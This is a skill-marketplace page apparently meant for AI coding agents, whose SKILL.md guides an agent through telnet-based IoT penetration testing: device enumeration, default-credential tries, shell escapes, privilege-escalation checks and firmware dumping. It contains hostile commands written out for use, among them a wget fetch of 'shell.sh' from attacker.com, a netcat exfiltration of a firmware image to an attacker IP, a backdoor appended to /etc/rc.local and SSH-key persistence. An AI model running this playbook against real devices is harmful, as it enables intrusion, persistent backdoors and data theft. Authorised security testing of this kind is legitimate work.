telnetshell

Use telnet to interact with IoT device shells for pentesting operations including device enumeration, vulnerability discovery, credential testing, and post-exploitation. Use when the user needs to interact with network-accessible shells, IoT devices, or telnet services.

242 stars

byaiskillstore

View on GitHub Installation ↓

Best use case

telnetshell is best used when you need a repeatable AI agent workflow instead of a one-off prompt. It is especially useful for teams working in multi. Use telnet to interact with IoT device shells for pentesting operations including device enumeration, vulnerability discovery, credential testing, and post-exploitation. Use when the user needs to interact with network-accessible shells, IoT devices, or telnet services.

Users should expect a more consistent workflow output, faster repeated execution, and less time spent rewriting prompts from scratch.

Practical example

Example input

Use the "telnetshell" skill to help with this workflow task. Context: Use telnet to interact with IoT device shells for pentesting operations including device enumeration, vulnerability discovery, credential testing, and post-exploitation. Use when the user needs to interact with network-accessible shells, IoT devices, or telnet services.

Example output

A structured workflow result with clearer steps, more consistent formatting, and an output that is easier to reuse in the next run.

When to use this skill

Use this skill when you want a reusable workflow rather than writing the same prompt again and again.

When not to use this skill

Do not use this when you only need a one-off answer and do not need a reusable workflow.
Do not use it if you cannot install or maintain the related files, repository context, or supporting tools.

Installation

Claude Code / Cursor / Codex

$curl -o ~/.claude/skills/telnetshell/SKILL.md --create-dirs "https://raw.githubusercontent.com/aiskillstore/marketplace/main/skills/brownfinesecurity/telnetshell/SKILL.md"

Manual Installation

Download SKILL.md from GitHub
Place it in .claude/skills/telnetshell/SKILL.md inside your project
Restart your AI agent — it will auto-discover the skill

How telnetshell Compares

Feature / Agent	telnetshell	Standard Approach
Platform Support	Not specified	Limited / Varies
Context Awareness	High	Baseline
Installation Complexity	Unknown	N/A

Frequently Asked Questions

What does this skill do?

Where can I find the source code?

You can find the source code on GitHub using the link provided at the top of the page.

SKILL.md Source

# IoT Telnet Shell (telnetshell)

This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities.

## Prerequisites

- Python 3 with pexpect library (`pip install pexpect` or `sudo pacman -S python-pexpect`)
- telnet client installed on the system (`sudo pacman -S inetutils` on Arch)
- Network access to the target device's telnet port

## Recommended Approach: Telnet Helper Script

**IMPORTANT**: This skill includes a Python helper script (`telnet_helper.py`) that provides a clean, reliable interface for telnet communication. **This is the RECOMMENDED method** for interacting with IoT devices.

### Default Session Logging

**ALL commands run by Claude will be logged to `/tmp/telnet_session.log` by default.**

To observe what Claude is doing in real-time:
```bash
# In a separate terminal, run:
tail -f /tmp/telnet_session.log
```

This allows you to watch all telnet I/O as it happens without interfering with the connection.

### Why Use the Telnet Helper?

The helper script solves many problems with direct telnet usage:
- **Clean output**: Automatically removes command echoes, prompts, and ANSI codes
- **Prompt detection**: Automatically detects and waits for device prompts
- **Timeout handling**: Proper timeout management with no arbitrary sleeps
- **Easy scripting**: Simple command-line interface for single commands or batch operations
- **Session logging**: All I/O logged to `/tmp/telnet_session.log` for observation
- **Reliable**: No issues with TTY requirements or background processes
- **JSON output**: For programmatic parsing and tool chaining

### Quick Start with Telnet Helper

**Single Command:**
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a"
```

**Custom Port:**
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --command "ls /"
```

**With Custom Prompt (recommended for known devices):**
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --prompt "^/ [#\$]" --command "ifconfig"
```

**Interactive Mode:**
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --interactive
```

**Batch Commands from File:**
```bash
# Create a file with commands (one per line)
echo -e "uname -a\ncat /proc/version\nifconfig\nps" > commands.txt
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --script commands.txt
```

**JSON Output (for parsing):**
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a" --json
```

**Debug Mode:**
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "ls" --debug
```

**Session Logging (for observation):**
```bash
# Terminal 1 - Run with logging
python3 .claude/skills/telnetshell/telnet_helper.py \
  --host 192.168.1.100 \
  --port 2222 \
  --logfile /tmp/session.log \
  --interactive

# Terminal 2 - Watch the session in real-time
tail -f /tmp/session.log
```

**Note:** See `OBSERVING_SESSIONS.md` for comprehensive guide on monitoring telnet sessions.

### Telnet Helper Options

```
Required (one of):
  --command, -c CMD         Execute single command
  --interactive, -i         Enter interactive mode
  --script, -s FILE         Execute commands from file

Connection Options:
  --host, -H HOST           Target host IP or hostname (required)
  --port, -P PORT           Telnet port (default: 23)
  --timeout, -t SECONDS     Command timeout (default: 3.0)
  --prompt, -p PATTERN      Custom prompt regex pattern

Output Options:
  --raw, -r                 Don't clean output (show echoes, prompts)
  --json, -j                Output in JSON format
  --logfile, -l FILE        Log all I/O to file (default: /tmp/telnet_session.log)
  --debug                   Show debug information
```

### Common Prompt Patterns

The helper script includes common prompt patterns, but you can specify custom ones:

```bash
# BusyBox shell (common on IoT)
--prompt "/\s*[#\$]\s*$"

# Standard root/user prompts
--prompt "^[#\$]\s*$"

# Custom device
--prompt "^MyDevice>\s*$"

# Uniview cameras
--prompt "^User@[^>]+>\s*$"
```

### Device Enumeration Example with Telnet Helper

Here's a complete example of safely enumerating a device:

```bash
# Set variables for convenience
HELPER="python3 .claude/skills/telnetshell/telnet_helper.py"
HOST="192.168.1.100"
PORT="2222"
LOGFILE="/tmp/telnet_session.log"

# System information
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "uname -a"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /proc/version"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /proc/cpuinfo"

# Check for BusyBox
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "busybox"

# Network configuration
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "ifconfig"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "route -n"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "netstat -tulpn"

# Process listing (may need longer timeout)
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --timeout 5 --command "ps aux"

# File system exploration
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "ls -la /"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "mount"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "df -h"

# Security assessment
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /etc/passwd"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "find / -perm -4000 2>/dev/null"
```

**IMPORTANT FOR CLAUDE CODE**: When using this skill, ALWAYS include `--logfile /tmp/telnet_session.log` in every command so the user can monitor activity with `tail -f /tmp/telnet_session.log`.

## Instructions

### 1. Connection Setup

**Default connection:**
- **Port**: 23 (standard telnet, override with `--port`)
- **Timeout**: 3 seconds (override with `--timeout`)
- **Logging**: `/tmp/telnet_session.log` by default

**Common telnet ports on IoT devices:**
- 23: Standard telnet port
- 2222: Alternative telnet port (common on cameras)
- 8023: Alternative telnet port
- Custom ports: Check device documentation or nmap scan results

### 2. BusyBox Shells (Most IoT Devices)

**IMPORTANT**: The vast majority of IoT devices use BusyBox, a lightweight suite of Unix utilities designed for embedded systems. BusyBox provides a minimal shell environment with limited command functionality.

**Identifying BusyBox:**
```bash
# Check what shell you're using
busybox
busybox --help

# Or check symlinks
ls -la /bin/sh
# Often shows: /bin/sh -> /bin/busybox

# List available BusyBox applets
busybox --list
```

**BusyBox Limitations:**
- Many standard Linux commands may be simplified versions
- Some common flags/options may not be available
- Features like tab completion may be limited or absent
- Some exploitation techniques that work on full Linux may not work

**Common BusyBox commands available:**
```bash
# Core utilities (usually available)
cat, ls, cd, pwd, echo, cp, mv, rm, mkdir, chmod, chown
ps, kill, top, free, df, mount, umount
grep, find, sed, awk (limited versions)
ifconfig, route, ping, netstat, telnet
vi (basic text editor - no syntax highlighting)

# Check what's available
busybox --list | sort
ls /bin /sbin /usr/bin /usr/sbin
```

**BusyBox-specific considerations for pentesting:**
- `ps` output format may differ from standard Linux
- Some privilege escalation techniques require commands not in BusyBox
- File permissions still work the same (SUID, sticky bits, etc.)
- Networking tools are often present (telnet, wget, nc/netcat, ftpget)
- Python/Perl/Ruby are usually NOT available (device storage constraints)

**Useful BusyBox commands for enumeration:**
```bash
# Check BusyBox version (may have known vulnerabilities)
busybox | head -1

# Network utilities often available
nc -l -p 4444  # Netcat listener
wget http://attacker.com/shell.sh
ftpget server file
telnet 192.168.1.1

# httpd (web server) often included
busybox httpd -p 8080 -h /tmp  # Quick file sharing
```

### 3. Device Enumeration

Once you have shell access, gather the following information:

**System Information:**
```bash
# Kernel and system info
uname -a
cat /proc/version
cat /proc/cpuinfo
cat /proc/meminfo

# Distribution/firmware info
cat /etc/issue
cat /etc/*release*
cat /etc/*version*

# Hostname and network
hostname
cat /etc/hostname
ifconfig -a
cat /etc/network/interfaces
cat /etc/resolv.conf

# Mounted filesystems
mount
cat /proc/mounts
df -h

# Running processes
ps aux
ps -ef
top -b -n 1
```

**User and Permission Information:**
```bash
# Current user context
id
whoami
groups

# User accounts
cat /etc/passwd
cat /etc/shadow  # If readable - major security issue!
cat /etc/group

# Sudo/privilege info
sudo -l
cat /etc/sudoers
```

**Network Services:**
```bash
# Listening services
netstat -tulpn
lsof -i

# Firewall rules
iptables -L -n -v
cat /etc/iptables/*
```

**Interesting Files and Directories:**
```bash
# Configuration files
ls -la /etc/
find /etc/ -type f -readable

# Web server configs
ls -la /etc/nginx/
ls -la /etc/apache2/
ls -la /var/www/

# Credentials and keys
find / -name "*.pem" 2>/dev/null
find / -name "*.key" 2>/dev/null
find / -name "*password*" 2>/dev/null
find / -name "*credential*" 2>/dev/null
grep -r "password" /etc/ 2>/dev/null

# SUID/SGID binaries (privilege escalation vectors)
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null

# World-writable files/directories
find / -perm -2 -type f 2>/dev/null
find / -perm -2 -type d 2>/dev/null

# Development/debugging tools
which gdb gcc python perl ruby tcpdump
ls /usr/bin/ /bin/ /sbin/ /usr/sbin/
```

### 4. Privilege Escalation (if not root)

**Check for common vulnerabilities:**
```bash
# Kernel exploits
uname -r  # Check kernel version for known exploits

# Check for exploitable services
ps aux | grep root

# Writable service files
find /etc/init.d/ -writable 2>/dev/null

# Cron jobs
crontab -l
ls -la /etc/cron*
cat /etc/crontab
```

### 5. Persistence and Further Access

**Establish additional access methods:**
```bash
# Add SSH access (if SSH is available)
mkdir -p /root/.ssh
echo "your_ssh_public_key" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chmod 700 /root/.ssh

# Start SSH service (if not running)
/etc/init.d/ssh start
# or
/etc/init.d/sshd start
# or
/etc/init.d/dropbear start  # Common on embedded devices

# Add to startup scripts
echo "/path/to/backdoor &" >> /etc/rc.local
```

### 6. Firmware Extraction

**Extract firmware for offline analysis:**
```bash
# Find MTD partitions (common on embedded devices)
cat /proc/mtd
cat /proc/partitions

# Dump flash partitions
dd if=/dev/mtd0 of=/tmp/bootloader.bin
dd if=/dev/mtd1 of=/tmp/kernel.bin
dd if=/dev/mtd2 of=/tmp/rootfs.bin

# Copy to external storage or network
# If network is available:
nc attacker_ip 4444 < /tmp/rootfs.bin

# If HTTP server is available:
cd /tmp
busybox httpd -p 8000
# Then download from http://device_ip:8000/rootfs.bin
```

## Common IoT Device Scenarios

### Scenario 1: No Authentication Shell
```bash
# Connect - drops directly to root shell
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --interactive
# Enumerate and exploit
```

### Scenario 2: Custom Port No-Auth Shell
```bash
# Many IoT cameras use port 2222
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --interactive
```

### Scenario 3: Password-Protected Shell
```bash
# If you encounter a password prompt, the helper will detect it
# Try default credentials:
# - root/root
# - admin/admin
# - root/(empty)
# Search online for device-specific defaults
```

### Scenario 4: Limited Shell Escape
```bash
# If you get a limited shell:
# Try common escape techniques:
echo $SHELL
/bin/sh
/bin/bash
vi  # Then :!/bin/sh
less /etc/passwd  # Then !/bin/sh
find / -exec /bin/sh \;
awk 'BEGIN {system("/bin/sh")}'
```

## Security Testing Checklist

- [ ] Identify device and firmware version
- [ ] Check for unauthenticated access
- [ ] Test for default/weak credentials
- [ ] Enumerate network services and open ports
- [ ] Check for hardcoded credentials in files
- [ ] Test for command injection vulnerabilities
- [ ] Check file permissions (SUID, world-writable)
- [ ] Check for outdated software with known CVEs
- [ ] Test for privilege escalation vectors
- [ ] Extract firmware for offline analysis
- [ ] Document all findings with screenshots/logs

## Best Practices

1. **Always log your session**: Default logfile is `/tmp/telnet_session.log`
2. **Document everything**: Take notes on commands, responses, and findings
3. **Use batch scripts**: Create enumeration scripts for common tasks
4. **Research the device**: Look up known vulnerabilities, default credentials, and common issues
5. **Use proper authorization**: Only perform pentesting on devices you own or have explicit permission to test
6. **Be careful with destructive commands**: Avoid commands that could brick devices or corrupt data
7. **Monitor your session**: Use `tail -f` in another terminal to watch activity

## Troubleshooting

**Problem: Connection refused**
- Solution: Check if telnet service is running, verify port number, check firewall rules

**Problem: Connection timeout**
- Solution: Verify network connectivity, check if device is powered on, verify IP address

**Problem: "Permission denied"**
- Solution: Telnet service may require authentication, try default credentials

**Problem: Commands not echoing**
- Solution: Use `--raw` flag to see unfiltered output

**Problem: Garbled output or wrong prompt detection**
- Solution: Use `--prompt` flag with custom regex pattern for your specific device

## Pre-built Enumeration Scripts

The skill includes pre-built enumeration scripts for common tasks:

- `enum_system.txt`: System information gathering
- `enum_network.txt`: Network configuration enumeration
- `enum_files.txt`: File system exploration
- `enum_security.txt`: Security-focused enumeration

**Usage:**
```bash
python3 .claude/skills/telnetshell/telnet_helper.py \
  --host 192.168.1.100 \
  --port 2222 \
  --script .claude/skills/telnetshell/enum_system.txt
```

## Example Usage

```bash
# Basic connection to standard telnet port
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a"

# Connection to custom port (common for IoT cameras)
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --command "ls /"

# Interactive session with logging
python3 .claude/skills/telnetshell/telnet_helper.py \
  --host 192.168.1.100 \
  --port 2222 \
  --logfile /tmp/camera_session.log \
  --interactive

# Batch enumeration
python3 .claude/skills/telnetshell/telnet_helper.py \
  --host 192.168.1.100 \
  --port 2222 \
  --script enum_system.txt \
  --json > results.json

# Long-running command with custom timeout
python3 .claude/skills/telnetshell/telnet_helper.py \
  --host 192.168.1.100 \
  --timeout 10 \
  --command "find / -name '*.conf'"
```

## References

- [BusyBox Official Site](https://busybox.net/)
- [BusyBox Command List](https://busybox.net/downloads/BusyBox.html)
- IoT pentesting resources and vulnerability databases
- Device-specific documentation and datasheets

Related Skills

azure-quotas

242

from aiskillstore/marketplace

Check/manage Azure quotas and usage across providers. For deployment planning, capacity validation, region selection. WHEN: "check quotas", "service limits", "current usage", "request quota increase", "quota exceeded", "validate capacity", "regional availability", "provisioning limits", "vCPU limit", "how many vCPUs available in my subscription".

DevOps & Infrastructure

raindrop-io

242

from aiskillstore/marketplace

Manage Raindrop.io bookmarks with AI assistance. Save and organize bookmarks, search your collection, manage reading lists, and organize research materials. Use when working with bookmarks, web research, reading lists, or when user mentions Raindrop.io.

Data & Research

zlibrary-to-notebooklm

242

from aiskillstore/marketplace

自动从 Z-Library 下载书籍并上传到 Google NotebookLM。支持 PDF/EPUB 格式，自动转换，一键创建知识库。

discover-skills

242

from aiskillstore/marketplace

当你发现当前可用的技能都不够合适（或用户明确要求你寻找技能）时使用。本技能会基于任务目标和约束，给出一份精简的候选技能清单，帮助你选出最适配当前任务的技能。

web-performance-seo

242

from aiskillstore/marketplace

Fix PageSpeed Insights/Lighthouse accessibility "!" errors caused by contrast audit failures (CSS filters, OKLCH/OKLAB, low opacity, gradient text, image backgrounds). Use for accessibility-driven SEO/performance debugging and remediation.

project-to-obsidian

242

from aiskillstore/marketplace

将代码项目转换为 Obsidian 知识库。当用户提到 obsidian、项目文档、知识库、分析项目、转换项目时激活。【激活后必须执行】： 1. 先完整阅读本 SKILL.md 文件 2. 理解 AI 写入规则（默认到 00_Inbox/AI/、追加式、统一 Schema） 3. 执行 STEP 0: 使用 AskUserQuestion 询问用户确认 4. 用户确认后才开始 STEP 1 项目扫描 5. 严格按 STEP 0 → 1 → 2 → 3 → 4 顺序执行【禁止行为】： - 禁止不读 SKILL.md 就开始分析项目 - 禁止跳过 STEP 0 用户确认 - 禁止直接在 30_Resources 创建（先到 00_Inbox/AI/） - 禁止自作主张决定输出位置

obsidian-helper

242

from aiskillstore/marketplace

Obsidian 智能笔记助手。当用户提到 obsidian、日记、笔记、知识库、capture、review 时激活。【激活后必须执行】： 1. 先完整阅读本 SKILL.md 文件 2. 理解 AI 写入三条硬规矩（00_Inbox/AI/、追加式、白名单字段） 3. 按 STEP 0 → STEP 1 → ... 顺序执行 4. 不要跳过任何步骤，不要自作主张【禁止行为】： - 禁止不读 SKILL.md 就开始工作 - 禁止跳过用户确认步骤 - 禁止在非 00_Inbox/AI/ 位置创建新笔记（除非用户明确指定）

internationalizing-websites

242

from aiskillstore/marketplace

Adds multi-language support to Next.js websites with proper SEO configuration including hreflang tags, localized sitemaps, and language-specific content. Use when adding new languages, setting up i18n, optimizing for international SEO, or when user mentions localization, translation, multi-language, or specific languages like Japanese, Korean, Chinese.

google-official-seo-guide

242

from aiskillstore/marketplace

Official Google SEO guide covering search optimization, best practices, Search Console, crawling, indexing, and improving website search visibility based on official Google documentation

github-release-assistant

242

from aiskillstore/marketplace

Generate bilingual GitHub release documentation (README.md + README.zh.md) from repo metadata and user input, and guide release prep with git add/commit/push. Use when the user asks to write or polish README files, create bilingual docs, prepare a GitHub release, or mentions release assistant/README generation.

doc-sync-tool

242

from aiskillstore/marketplace

自动同步项目中的 Agents.md、claude.md 和 gemini.md 文件，保持内容一致性。支持自动监听和手动触发。

deploying-to-production

242

from aiskillstore/marketplace

Automate creating a GitHub repository and deploying a web project to Vercel. Use when the user asks to deploy a website/app to production, publish a project, or set up GitHub + Vercel deployment.